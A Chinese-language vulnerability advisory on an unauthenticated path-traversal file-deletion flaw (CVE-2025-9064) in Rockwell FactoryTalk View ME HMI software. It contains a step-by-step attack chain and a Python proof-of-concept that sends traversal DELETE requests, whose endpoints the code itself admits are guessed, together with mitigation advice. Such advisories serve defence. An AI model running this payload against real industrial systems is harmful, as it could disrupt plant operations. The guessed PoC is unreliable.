CVE-2025-9064：Rockwell FactoryTalk View Machine Edition 路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-9064

漏洞类型

路径遍历（Path Traversal）

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Rockwell Automation FactoryTalk View Machine Edition

漏洞概述

CVE-2025-9064是Rockwell Automation公司FactoryTalk View Machine Edition（FTView ME）人机界面（HMI）软件中的一个严重路径遍历漏洞，CVSS评分为9.1，属于严重级别。该漏洞于2025年10月14日公开披露，由Rockwell Automation的PSIRT（产品安全事件响应团队）发现并报告。FactoryTalk View Machine Edition是Rockwell Automation旗下广泛应用于工业自动化领域的HMI开发与运行环境，常被部署在制造业、能源、过程控制等关键基础设施的PanelView终端上，用于监控和控制工业设备。

该漏洞允许同一网络上未经认证的远程攻击者通过构造特殊的路径遍历请求，删除设备操作系统中的任意文件。攻击者无需任何凭证即可发起攻击，也不需要用户交互。由于HMI设备通常运行在工业控制网络（ICS/SCADA）中，攻击者一旦成功利用此漏洞删除关键系统文件，可能导致HMI面板无法正常运行、工业控制系统可视化失效，甚至引发更严重的连锁反应，影响整个生产流程的安全性和可用性。需要注意的是，该漏洞的成功利用依赖于攻击者对目标设备上目标文件名的了解。

技术细节

路径遍历（Path Traversal）漏洞，又称目录遍历漏洞，通常发生在应用程序对用户输入的文件路径验证不充分时。攻击者通过在文件路径中插入特殊序列（如"../"或"..\\"），绕过应用程序对访问目录的限制，从而访问或操作预期目录之外的文件系统资源。

在CVE-2025-9064中，FactoryTalk View Machine Edition的某个文件操作接口未对用户提供的路径进行充分的过滤和规范化处理。攻击者可以发送包含路径遍历序列的特制HTTP/网络请求，指示服务端删除位于任意目录下的任意文件。由于该漏洞的攻击向量为网络（AV:N）、攻击复杂度低（AC:L）、无需权限（PR:N）且无需用户交互（UI:N），利用门槛极低。

具体利用方式如下：攻击者首先通过网络扫描或社会工程学手段获取目标FactoryTalk View ME面板的IP地址及监听端口信息。然后，攻击者构造包含路径遍历payload的删除请求（例如请求删除路径中包含"../"序列），由于服务端未对路径进行安全验证，请求将被处理并执行文件删除操作。攻击者需要预先知道目标文件的名称或路径，这可以通过枚举常见的系统文件路径或通过其他信息泄露手段获取。一旦关键文件被删除，可能导致HMI面板崩溃、服务不可用或系统功能异常，从而影响工业生产环境的连续性和安全性。

攻击链分析

STEP 1

步骤1：网络侦察

攻击者通过工业网络扫描工具（如Shodan、Nmap等）发现暴露在网络中的FactoryTalk View Machine Edition面板，获取目标设备的IP地址和开放端口信息。

STEP 2

步骤2：信息收集

攻击者通过枚举或社会工程学手段获取目标设备上需要删除的关键文件名或路径信息，如系统配置文件、日志文件或应用程序文件。

STEP 3

步骤3：构造恶意请求

攻击者构造包含路径遍历payload（如../）的特制HTTP请求，利用未经验证的文件路径删除接口，指定目标系统中的任意文件路径。

STEP 4

步骤4：发送攻击请求

攻击者通过同一网络向目标设备发送恶意删除请求，由于无需认证（PR:N）和无需用户交互（UI:N），请求被服务端直接处理。

STEP 5

步骤5：文件删除与影响

目标文件被成功删除，可能导致HMI面板系统崩溃、关键功能失效或工业控制系统可视化中断，影响生产环境的可用性和完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-9064 - FactoryTalk View Machine Edition Path Traversal PoC
# Vulnerability: Unauthenticated arbitrary file deletion via path traversal
# Affected Product: Rockwell Automation FactoryTalk View Machine Edition

import requests
import sys

TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.100"
TARGET_PORT = sys.argv[2] if len(sys.argv) > 2 else 80
TARGET_FILE = sys.argv[3] if len(sys.argv) > 3 else "Windows/System32/drivers/etc/hosts"

# Construct the base URL for the FactoryTalk View ME service
base_url = f"http://{TARGET_HOST}:{TARGET_PORT}"

# Path traversal payload to delete arbitrary files
# The vulnerability allows traversing out of the intended directory
traversal_payload = "../../../../../../../../../../" + TARGET_FILE

def exploit_delete_file(target_url, file_path):
    """
    Exploit path traversal to delete a file on the target system.
    The endpoint is guessed based on typical FTView ME service patterns.
    """
    # Attempt 1: Common file deletion endpoint with traversal
    endpoints = [
        "/FTView/file/delete",
        "/me/file/delete",
        "/runtime/file/delete",
        "/panelview/file/delete",
    ]

    for endpoint in endpoints:
        url = target_url + endpoint
        params = {"path": file_path}
        try:
            response = requests.delete(url, params=params, timeout=10)
            if response.status_code in [200, 204]:
                print(f"[+] Successfully sent delete request to {url}")
                print(f"[+] Target file: {file_path}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error connecting to {url}: {e}")
            continue
    return False

if __name__ == "__main__":
    print(f"[*] Targeting: {base_url}")
    print(f"[*] Target file: {TARGET_FILE}")
    print(f"[*] Traversal payload: {traversal_payload}")
    if exploit_delete_file(base_url, traversal_payload):
        print("[+] Exploit completed.")
    else:
        print("[-] Exploit failed. Target may not be vulnerable or endpoint differs.")

影响范围

Rockwell Automation FactoryTalk View Machine Edition（具体受影响版本请参考官方安全公告SD1753）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）将FactoryTalk View Machine Edition面板部署在经过网络分段隔离的工业控制网络中，限制仅授权的工程师站和操作员站可以访问；2）在网络边界部署工业防火墙，配置访问控制列表（ACL）阻止来自不可信网络的连接请求；3）监控面板的网络流量，检测异常的删除请求和路径遍历特征；4）定期备份面板的关键系统文件和配置，以便在遭受攻击后能够快速恢复；5）遵循纵深防御原则，在ICS/SCADA网络中部署多层安全控制措施。